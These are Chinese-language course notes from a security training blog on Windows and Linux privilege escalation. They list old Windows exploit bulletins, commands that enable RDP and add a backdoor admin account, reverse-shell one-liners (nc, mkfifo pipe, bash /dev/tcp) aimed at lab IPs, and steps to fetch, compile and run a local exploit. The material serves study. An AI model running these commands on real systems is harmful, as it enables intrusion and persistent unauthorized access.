引言:我的系列博客[網絡安全學習篇]上線了,小編也是初次創作博客,經驗不足;對千峯網絡信息安全開源的視頻公開課程的學習整理的筆記整理的也比較粗糙,其實看到目錄有300多集的時候,講道理,有點慫了,所以我就想到了通過寫博客(課程筆記)的形式去學習它,雖然寫博客會讓我多花幾倍的時間去學習它,但是當我完成一篇博客所獲得的成就感和你們對於我的認同感,讓我很滿足,能夠鼓勵我一天天的堅持下去,也希望和我一起學習本期視頻的"同道"們也能給一直堅持下去。我們大家一起加油。由於作者本身也是網絡信息安全小白,大部分知識點都是初次接觸,出現對其理解不深入,不完整,甚至也會出現錯誤有問題的地方,希望大家諒解、留言提出指正,同時也歡迎大家來找我一起交流學習!!!
往期博客:
第一階段:
[網絡安全學習篇1]:windowsxp、windows2003、windows7、windows2008系統部署(千峯網絡安全視頻筆記)
[網絡安全學習篇24]:漏洞與木馬(千峯網絡安全視頻筆記 p117-p118)
第二階段:
第三階段:
[網絡安全學習篇42]:靶場環境搭建(ubuntu系統安裝優化及vulhub安裝)
[網絡安全學習篇43]:PHP基礎+變量 運算符 流程控制語句
第四階段:
[網絡安全學習篇65]:提權(本篇)
下期博文:
目錄
提權
權限提升
水平權限提升(越權)
A|B(A,B同級) C 是管理員
垂直權限提升
普通用戶獲得了管理員的權限
Web 用戶直接提權成管理員用戶
基於WebShell 的提權
IIS 的 aspx 大馬
asp 腳本權限比較低
嘗試上傳aspx 的大馬
Windows
如果目標使用的是套件搭建的網站
phpstudy
xampp
wampserver
獲得WebShell 之後就是系統或管理員權限
寶塔
權限?
安全防禦比較高,禁用很多函數,考慮繞過
系統漏洞提權
找補丁,找漏洞,找EXP
Win2003
信息收集
----------------
systeminfo>C:\Windows\Temp\a.txt&(for %i in (
KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195 KB2503665 KB3031432) do @type C:\Windows\Temp\a.txt|@find /I "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt
----------------
----------------------------------------
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
MS15-097 [KB3089656] [remote code execution] (win8.1/2012)
MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)
MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012)
MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012)
MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)
MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8)
MS14-070 [KB2989935] [Kernel Driver] (2003)
MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8)
MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)
MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)
MS14-002 [KB2914368] [NDProxy] (2003/XP)
MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)
MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)
MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8)
MS12-042 [KB2972621] [Service Bus] (2008/2012/win7)
MS12-020 [KB2671387] [RDP] (2003/2008/7/XP)
MS11-080 [KB2592799] [AFD.sys] (2003/XP)
MS11-062 [KB2566454] [NDISTAPI] (2003/XP)
MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP)
MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista)
MS10-092 [KB2305420] [Task Scheduler] (2008/7)
MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista)
MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP)
MS09-050 [KB975517] [Remote Code Execution] (2008/Vista)
MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)
MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista)
MS08-068 [KB957097] [Remote Code Execution] (2000/XP)
MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista)
MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000)
MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
----------------------------------------
可能會遇到的問題
1、無法執行cmd命令(自己上傳一個cmd,或者考慮使用aspx大馬)
2、無法上傳提權exp
目錄寫權限
哪些目錄有寫權限?
日誌
緩存
回收站
大馬所在目錄
3、在命令行下開啓3389 端口
----------
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
-----------
4、如何創建Windows 用戶
net user hack 123.com /add
net localgroup administrators hack /add
數據庫提權
MSSQL
xp_cmdshell cmd 命令
前提,獲取mssql sa 的密碼
mysql 提權
利用mysql 執行cmd 命令
udf
mof
反彈Shell
基於WebShell 反彈Shell
建立一個持久性的連接
shell 命令解釋器
正向Shell 我主動連接服務器,服務器開始ssh 端口
反向Shell 服務器主動連接我們,我們監聽某一個端口
windows
nc.exe(網絡界的瑞士軍刀)va
powershell
kali
nc
mac
nc 不行
ncat namp
windows
nc.exe
我(kali):nc -lvvp 1234
服務器(win2008):nc.exe -e cmd.exe 192.168.1.200 1234
Linux
NC 本地監聽
[nc -lvvp 1234]
NC反彈
-e 參數可用
[nc -e /bin/bash 192.168.1.150 1234]
-------------------
當我們執行這條命令,出現Ncat: Permission denied.
我們通過查看系統日誌
[tail /var/log/messages]
解決方原因:selinux的攔截
法:將ncat限制給去掉了
ausearch -c 'nc' --raw | audit2allow -M my-nc
semodule -i my-nc.pp
-----------------
進入交互式shell
[python -c 'import pty;pty.spawn("/bin/bash")']
-e 參數不可用
[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.150 1234 >/tmp/f]
bash
[bash -i >& /dev/tcp/192.168.1.150/1234 0<&1]
Linux
利用系統漏洞提權
內核提權
第三方軟件
套路比較多
實戰中體會
dc 系列
靶機滲透
提權操作
收集系統信息
uname -a
提權輔助腳本
wget
[wget http://192.168.1.200:8000/linux-exploit-suggester.sh > les.sh]
curl
注:由於權限的問題,筆者這裏沒有成功,終究還是太菜了
搜索漏洞庫
Kali 漏洞庫
searchsploit centos 7
searchsploit -m 35370
Kali 中開啓httpd服務
python -m SimpleHTTPServer 8080
下載35370.c文件
wget http://192.168.1.150:8000/23270.c
運行提權腳本
gcc 35370.c -o exploit -lpthread
./exploit
id
參考文獻: